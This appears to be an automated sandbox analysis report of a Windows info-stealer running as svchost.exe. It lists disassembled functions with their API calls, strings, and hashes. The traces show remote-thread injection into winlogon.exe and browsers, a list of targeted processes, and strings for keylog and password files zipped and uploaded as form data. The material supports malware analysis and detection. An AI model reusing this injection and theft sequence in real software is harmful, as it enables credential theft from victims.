Function 00401580 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 215injectionlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401C70: memset.MSVCRT ref: 00401C96
Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76230F00,00000000,00000000), ref: 00401CA7
Part of subcall function 00401C70: GetLastError.KERNEL32 ref: 00401CB0
Part of subcall function 00401C70: SwitchToThread.KERNEL32 ref: 00401CBF
Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
Part of subcall function 00401C70: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
Part of subcall function 00401C70: CloseHandle.KERNEL32(00000000), ref: 00401CF9

Sleep.KERNEL32(00000064,00000000,?,76D6DB30,00402E38,winlogon.exe), ref: 004015AD
OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,76D6DB30,00402E38,winlogon.exe), ref: 004015CC
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004015EB
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401601
GetCurrentProcess.KERNEL32(00000000), ref: 0040160D
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401628
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401638
VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040167F
WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 004016A1
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004016CD
memcpy.MSVCRT(00000000,?,?), ref: 004016E8
WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 00401703
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00401711
WriteProcessMemory.KERNEL32(00000000,?,00406400,00050200,?), ref: 00401744
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401754
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401766
GetHandleInformation.KERNEL32(00000000), ref: 0040177E
CloseHandle.KERNEL32(00000000), ref: 0040178F
RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004017B0
GetHandleInformation.KERNEL32(00000000), ref: 004017CC
CloseHandle.KERNEL32(00000000), ref: 004017DD

Strings

IsWow64Process, xrefs: 004015FB, 00401632
kernel32.dll, xrefs: 004015DF, 0040161C

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
String ID: IsWow64Process$kernel32.dll
API String ID: 3542510048-3024904723
Opcode ID: 9e2c1cff1cdf4c28cbaf7383b6b48f0421d485e879072eb787a5153b6e1db307
Instruction ID: c9964d6c084eb6c4e09adf0a78a82ba29cca963801df753bbce45d31a4150425
Opcode Fuzzy Hash: 9e2c1cff1cdf4c28cbaf7383b6b48f0421d485e879072eb787a5153b6e1db307
Instruction Fuzzy Hash: 5571A3B1600315ABE710DFA4DD89F6F77B8AF84B04F144029FA05B72D1E7B8994587AC

Function 02C766D0 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 215memoryfilestringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,02C92BB9,75AF5CE0), ref: 02C7670B
HeapAlloc.KERNEL32(00000000), ref: 02C76712
memset.MSVCRT ref: 02C7672A
lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02C76739
FindFirstFileA.KERNEL32(00000000,?), ref: 02C76761

Strings

\*.*, xrefs: 02C7674A

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocFileFindFirstProcesslstrcpynmemset
String ID: \*.*
API String ID: 2617121151-1173974218
Opcode ID: 08f605f3dea216708c9ac44273907c8a67f20b2d80d1f0db99049bcdb3fcf0bf
Instruction ID: 7becebad95b7428ba07262907e1d3278c4549d4a02366af0e28626690a94c87c
Opcode Fuzzy Hash: 08f605f3dea216708c9ac44273907c8a67f20b2d80d1f0db99049bcdb3fcf0bf
Instruction Fuzzy Hash: 00616A71E447865BC7224F309C98BA77FADEF81754F244A54F9819B282DB31D60CC791

Function 02C93240 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 211injectionlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02C93B50: memset.MSVCRT ref: 02C93B76
Part of subcall function 02C93B50: CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,76230F00), ref: 02C93B87
Part of subcall function 02C93B50: GetLastError.KERNEL32 ref: 02C93B90
Part of subcall function 02C93B50: SwitchToThread.KERNEL32 ref: 02C93B9F
Part of subcall function 02C93B50: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02C93BA8
Part of subcall function 02C93B50: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C93BC8
Part of subcall function 02C93B50: CloseHandle.KERNEL32(00000000), ref: 02C93BD9

Sleep.KERNEL32(00000064,00000000,00000000,?,?), ref: 02C9327F
OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,?,?), ref: 02C9329E
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C932BD
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C932D3
GetCurrentProcess.KERNEL32(00000000), ref: 02C932DF
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C932FA
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C9330A
VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 02C93344
WriteProcessMemory.KERNEL32(00000000,00000000,?,?,?), ref: 02C93365
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02C93391
memcpy.MSVCRT(00000000,?,?,?,00003000,00000004), ref: 02C933A9
WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000004,?,?,00003000,00000004), ref: 02C933C4
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00003000,00000004), ref: 02C933D2
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 02C933FA
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C9340C
GetHandleInformation.KERNEL32(00000000,?), ref: 02C93424
CloseHandle.KERNEL32(00000000), ref: 02C93435
RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C93456
GetHandleInformation.KERNEL32(00000000,?), ref: 02C93472
CloseHandle.KERNEL32(00000000), ref: 02C93483

Strings

kernel32.dll, xrefs: 02C932B1, 02C932EE
IsWow64Process, xrefs: 02C932CD, 02C93304

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$CreateProcess$CloseInformationThreadVirtual$AddressAllocMemoryModuleProcSnapshotToolhelp32Write$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
String ID: IsWow64Process$kernel32.dll
API String ID: 2650560580-3024904723
Opcode ID: 16b50e25f9ab040db3dfa2b1bbdb07aab0756fc76a2135fbef614e906c7b86e1
Instruction ID: 1a168fb6bc5f68d4b946373794debbb1d69b3a86ee86773ba1e2fdee5f1489b9
Opcode Fuzzy Hash: 16b50e25f9ab040db3dfa2b1bbdb07aab0756fc76a2135fbef614e906c7b86e1
Instruction Fuzzy Hash: 92619571A40284BBEF12DF64CC89FAA77ACEF85B04F158599FD059B280DB74DA41CB60

Function 02C93950 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 181COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 02C9395E
GetWindowDC.USER32(00000000), ref: 02C93965
CreateCompatibleDC.GDI32(00000000), ref: 02C9397A

Strings

(, xrefs: 02C939D2
BM, xrefs: 02C93AB9

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Window$CompatibleCreateDesktop
String ID: ($BM
API String ID: 3720047489-2980357723
Opcode ID: 761bf98ec28bd78f3c0e41a818d42c92f8e27be2211aa4b5b08b509c60d22872
Instruction ID: 66da597546c0650b0bfef3b024a0a811454a89ce9df7fc2a3b6aa3b1ec11ce2a
Opcode Fuzzy Hash: 761bf98ec28bd78f3c0e41a818d42c92f8e27be2211aa4b5b08b509c60d22872
Instruction Fuzzy Hash: 0D516271E40258BBDB11DFA4EC48BAEBBB9FF88711F104659F904E7280DB709D118BA5

Function 02C97CE0 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 178filememoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,75AF5CE0), ref: 02C97D61
_snprintf.MSVCRT ref: 02C97D7D
FindFirstFileA.KERNEL32(00000000,?), ref: 02C97D8C
LocalFree.KERNEL32(00000000), ref: 02C97D99
wsprintfA.USER32 ref: 02C97DD8
wsprintfA.USER32 ref: 02C97DE6
FindNextFileA.KERNELBASE(00000000,?), ref: 02C97EDD
FindClose.KERNEL32(00000000), ref: 02C97EEC

Strings

%s\%s, xrefs: 02C97DB8, 02C97DE0
%s\*, xrefs: 02C97D72
%s%s, xrefs: 02C97DC1, 02C97DD2
., xrefs: 02C97DAA

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Find$FileLocalwsprintf$AllocCloseFirstFreeNext_snprintf
String ID: %s%s$%s\%s$%s\*$.
API String ID: 2477558990-1591360731
Opcode ID: 22a46c917d42efc872d68bdad4e6a639e7edcdfb77f4687c4e169961cb074ba6
Instruction ID: 6757e22f4457f9fe528c54067ee3e75b42a07278352973efa6c4b4563010fc51
Opcode Fuzzy Hash: 22a46c917d42efc872d68bdad4e6a639e7edcdfb77f4687c4e169961cb074ba6
Instruction Fuzzy Hash: 8E5191F1A153919FDB11DF28D848FBBBBADBBC5704F044A48F9819B245D7709908CBA2

Function 02C83D90 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 87networkstringCOMMON

Download Yara Rule

APIs

IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
IsUserAnAdmin.SHELL32 ref: 02C83DB1
DnsFlushResolverCache.DNSAPI ref: 02C83DBB
memset.MSVCRT ref: 02C83DD8
lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
memset.MSVCRT ref: 02C83E3C
lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75

Strings

www.microsoft.com, xrefs: 02C83E5C
www.bing.com, xrefs: 02C83E04
http://, xrefs: 02C83DEB, 02C83E49

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: CheckConnectionInternetlstrcpynmemset$AdminAliveCacheFlushNetworkResolverUser
String ID: http://$www.bing.com$www.microsoft.com
API String ID: 1656757314-3977723178
Opcode ID: 046cff174cf00cf9745e4414d1a13b771669121d0302758fc0263850c3479c27
Instruction ID: d45695dd1716ebac61938a8b3cd0950e38a12e6e9132130ccafc4e5caf358cfc
Opcode Fuzzy Hash: 046cff174cf00cf9745e4414d1a13b771669121d0302758fc0263850c3479c27
Instruction Fuzzy Hash: 8121CD73E8425867E721E7A49C41FDAB76CDF94B14F0045D5FA88E7080DAF19AC48B91

Function 02C77020 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 76sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02C77041
Sleep.KERNEL32(00000064), ref: 02C77052
OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02C77060
ReleaseMutex.KERNEL32(00000000), ref: 02C77069
GetHandleInformation.KERNEL32(00000000,?), ref: 02C7707F
CloseHandle.KERNEL32(00000000), ref: 02C77091
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C770B9
StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02C770D2
ExitProcess.KERNEL32 ref: 02C770DD
SetEvent.KERNEL32(00000000), ref: 02C770E9
Sleep.KERNEL32(000007D0), ref: 02C770F4

Strings

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}, xrefs: 02C77035, 02C77054
\explorer.exe, xrefs: 02C770C8
P0#v, xrefs: 02C77069

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Mutex$HandleOpenSleep$CloseEventExitFileInformationModuleNameProcessRelease
String ID: Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}$P0#v$\explorer.exe
API String ID: 2248524772-2059955476
Opcode ID: baeaa3e8bd56cf9e915a1522bfc4e803d915b3a43fc1007f0841b28de74fd959
Instruction ID: 89f55bf59260a55909fb45ec8e651e1948a1b63d5d2c83ccde98a960c91ce188
Opcode Fuzzy Hash: baeaa3e8bd56cf9e915a1522bfc4e803d915b3a43fc1007f0841b28de74fd959
Instruction Fuzzy Hash: 39210831E847446BE322BB759C09F6AFB9CAFC0B10F004655F95493181DBB4D9188AE2

Function 02C72BB0 Relevance: 21.5, APIs: 14, Instructions: 466COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 02C72C8F
exit.MSVCRT ref: 02C72CA1
calloc.MSVCRT ref: 02C72CAA
exit.MSVCRT ref: 02C72CBC
calloc.MSVCRT ref: 02C72CC5
exit.MSVCRT ref: 02C72CD7
calloc.MSVCRT ref: 02C72CE0
exit.MSVCRT ref: 02C72CF2
calloc.MSVCRT ref: 02C72D36
free.MSVCRT ref: 02C72FBF
free.MSVCRT ref: 02C72FE3
free.MSVCRT ref: 02C73004
free.MSVCRT ref: 02C73025
free.MSVCRT ref: 02C73063

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: callocfree$exit
String ID:
API String ID: 337157181-0
Opcode ID: 7f48ad7fa4da548279fe1b0c99727c96497688232c9c7f067b880dbf04229b04
Instruction ID: 67329b314172805e52ad59086c6dbb5ba13a56f959d6b419cfae029237b9aa8e
Opcode Fuzzy Hash: 7f48ad7fa4da548279fe1b0c99727c96497688232c9c7f067b880dbf04229b04
Instruction Fuzzy Hash: FDF1CF71A0065A9FDB20CF98D884BAEB7B5FF88314F144169ED05A7340D771EE51CBA2

Function 02C86370 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88memoryprocessCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02C86384
Process32First.KERNEL32(00000000,?), ref: 02C863A9
GetCurrentProcessId.KERNEL32(?,00000000), ref: 02C863CD
StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|,?,?,00000000), ref: 02C863E7
EnterCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C8640B
GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02C86411
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02C86418
LeaveCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C86446

Part of subcall function 02C92E00: OpenProcess.KERNEL32(00000400,00000000,00000000,7622F550,00000000,7736C3F0), ref: 02C92E15
Part of subcall function 02C92E00: OpenProcessToken.ADVAPI32(00000000,00000010,?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E2C
Part of subcall function 02C92E00: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02C92E4A
Part of subcall function 02C92E00: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E62
Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C92EBB
Part of subcall function 02C92E00: CloseHandle.KERNEL32(?), ref: 02C92ECC
Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(00000000,?), ref: 02C92EDE
Part of subcall function 02C92E00: CloseHandle.KERNEL32(00000000), ref: 02C92EEF

Process32Next.KERNEL32(00000000,00000128), ref: 02C8645A
GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02C86474
CloseHandle.KERNEL32(00000000,?,00000000), ref: 02C86485

Strings

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|, xrefs: 02C863E2

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$InformationProcess$Close$CriticalHeapOpenProcess32SectionToken$AllocateCharCreateCurrentEnterFirstLeaveNextSnapshotToolhelp32Upper
String ID: iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|
API String ID: 838372802-860058239
Opcode ID: 309971bf6f53314554b47302d7e277ad4b9c34fe133696fd324226235836fcf3
Instruction ID: 1acad026bad8bc81f15bff71473b071b2aa7c70764d43b849abcc9449434b30f
Opcode Fuzzy Hash: 309971bf6f53314554b47302d7e277ad4b9c34fe133696fd324226235836fcf3
Instruction Fuzzy Hash: CC319470D41254EFDB21DF65D849B9EB7BCFF88718F1085A9E849D3240D7309A45CB61

Function 02C76A30 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 91threadstringnativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 02C76A4C
GetCurrentProcessId.KERNEL32 ref: 02C76A5F

Part of subcall function 02C92E00: OpenProcess.KERNEL32(00000400,00000000,00000000,7622F550,00000000,7736C3F0), ref: 02C92E15
Part of subcall function 02C92E00: OpenProcessToken.ADVAPI32(00000000,00000010,?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E2C
Part of subcall function 02C92E00: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02C92E4A
Part of subcall function 02C92E00: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E62
Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C92EBB
Part of subcall function 02C92E00: CloseHandle.KERNEL32(?), ref: 02C92ECC
Part of subcall function 02C92E00: GetHandleInformation.KERNEL32(00000000,?), ref: 02C92EDE
Part of subcall function 02C92E00: CloseHandle.KERNEL32(00000000), ref: 02C92EEF

GetCurrentThreadId.KERNEL32 ref: 02C76A6E
GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C76A87
GetUserObjectInformationA.USER32(00000000), ref: 02C76A8E
lstrcmpiA.KERNEL32(?,7d2de3ada), ref: 02C76AA4
memset.MSVCRT ref: 02C76AE9
_snprintf.MSVCRT ref: 02C76B03
OpenMutexA.KERNEL32(00100000,00000000,?), ref: 02C76B16

Strings

Global\HighMemoryEvent_%08x, xrefs: 02C76AF2
7d2de3ada, xrefs: 02C76A98

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Information$Handle$OpenProcess$CloseCurrentThreadToken$CharDesktopMutexObjectQuerySystemUpperUser_snprintflstrcmpimemset
String ID: 7d2de3ada$Global\HighMemoryEvent_%08x
API String ID: 1400009243-3367381822
Opcode ID: c8ce148320c71e6f7165467db7b5d437f6a75079891ace40bf26555325746e95
Instruction ID: cab2f2639501efa66fa813353dfb62881e3343080eb70cdf95d92355d2c32780
Opcode Fuzzy Hash: c8ce148320c71e6f7165467db7b5d437f6a75079891ace40bf26555325746e95
Instruction Fuzzy Hash: 2A31F272A40255ABDB21CF61CC88BAAB77CFF94B10F144655FE4497280E7B0AD91CFA1

Function 029A1360 Relevance: 3.2, APIs: 2, Instructions: 241memorylibraryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,61FF864A), ref: 029A1451
LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,0AFB4677), ref: 029A1515

Memory Dump Source

Source File: 00000002.00000002.3391439892.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_29a0000_svchost.jbxd

Yara matches

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
Instruction ID: bb8178fee0d07ba4466ffa7705655954c1ec0c1b777c56eb866e195d8b30916b
Opcode Fuzzy Hash: 4c20f65d22fef1470a76e602a17beb2500452f3e339ad4f3f34e1df76570f847
Instruction Fuzzy Hash: EB914BB5D00719AFCB24DFE8C860BAEB7BAAF88354F154559E809B7344D734AA01CF94

Function 02C825C0 Relevance: 100.3, APIs: 41, Strings: 16, Instructions: 584
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(02CBD888,76232F00,00000000,76230F00), ref: 02C825D9
GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 02C825EB
_snprintf.MSVCRT ref: 02C8260B
SetCurrentDirectoryA.KERNEL32(?), ref: 02C8261B
PathAddBackslashA.SHLWAPI(?), ref: 02C82690
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C826DC
PathAddBackslashA.SHLWAPI(?), ref: 02C826E9
CopyFileA.KERNEL32(?,?,00000000), ref: 02C8272A
PathAddBackslashA.SHLWAPI(?), ref: 02C8275A
SetCurrentDirectoryA.KERNEL32(?), ref: 02C82BF2
PathFileExistsA.SHLWAPI(?), ref: 02C82BFF
SetFileAttributesA.KERNEL32(?,00000000), ref: 02C82C12
DeleteFileA.KERNEL32(?), ref: 02C82C1F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C82C43
HeapValidate.KERNEL32(00000000), ref: 02C82C46
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C82C52
HeapFree.KERNEL32(00000000), ref: 02C82C55
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C82C63
HeapValidate.KERNEL32(00000000), ref: 02C82C66
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C82C72
HeapFree.KERNEL32(00000000), ref: 02C82C75
LeaveCriticalSection.KERNEL32(02CBD888), ref: 02C82C7C

Strings

325b0ba3454dc65e, xrefs: 02C828F8, 02C82A02, 02C82AD2
keylog.txt, xrefs: 02C826A8
-----------------------------, xrefs: 02C828EF
%s%u.zip, xrefs: 02C827E9
passwords.txt, xrefs: 02C8276B
--, xrefs: 02C82B18
Content-Disposition: form-data; name="pcname", xrefs: 02C82960
software\microsoft, xrefs: 02C82BAF
Content-Disposition: form-data; name="file"; filename="report", xrefs: 02C82A6D
C:\Users\user\AppData\Roaming\, xrefs: 02C825F5, 02C827E4
-----------------------------, xrefs: 02C829FD, 02C82ACD
DEBUG, xrefs: 02C8262C, 02C82793, 02C82B5A
%s%s, xrefs: 02C825FA
7D2DE6CDa, xrefs: 02C826EB
7d2de689a, xrefs: 02C82BCB
Content-Type: text/plain, xrefs: 02C82A88

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Path$FileProcess$BackslashCurrentDirectory$CriticalFreeSectionValidate$AttributesCopyDeleteEnterExistsFolderLeave_snprintf
String ID: -----------------------------$%s%s$%s%u.zip$--$-----------------------------$325b0ba3454dc65e$7D2DE6CDa$7d2de689a$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$keylog.txt$passwords.txt$software\microsoft
API String ID: 390830577-4043088193
Opcode ID: e4eac7c1d77b19ea306828177a987b61ff49e9db60d14e95b29b38cd4e43e4e9
Instruction ID: 153a4528031931f15edd3c276ebaa6aa38732b7f5ceb29a19e473fb53db9173c
Opcode Fuzzy Hash: e4eac7c1d77b19ea306828177a987b61ff49e9db60d14e95b29b38cd4e43e4e9
Instruction Fuzzy Hash: 58124A719442C65BDB169F309C98BFBBBA5FF85308F0486D4ED869B240DB32DA09C791

Function 02C82669 Relevance: 91.5, APIs: 37, Strings: 15, Instructions: 528
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathAddBackslashA.SHLWAPI(?), ref: 02C82690
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C826DC
PathAddBackslashA.SHLWAPI(?), ref: 02C826E9
CopyFileA.KERNEL32(?,?,00000000), ref: 02C8272A
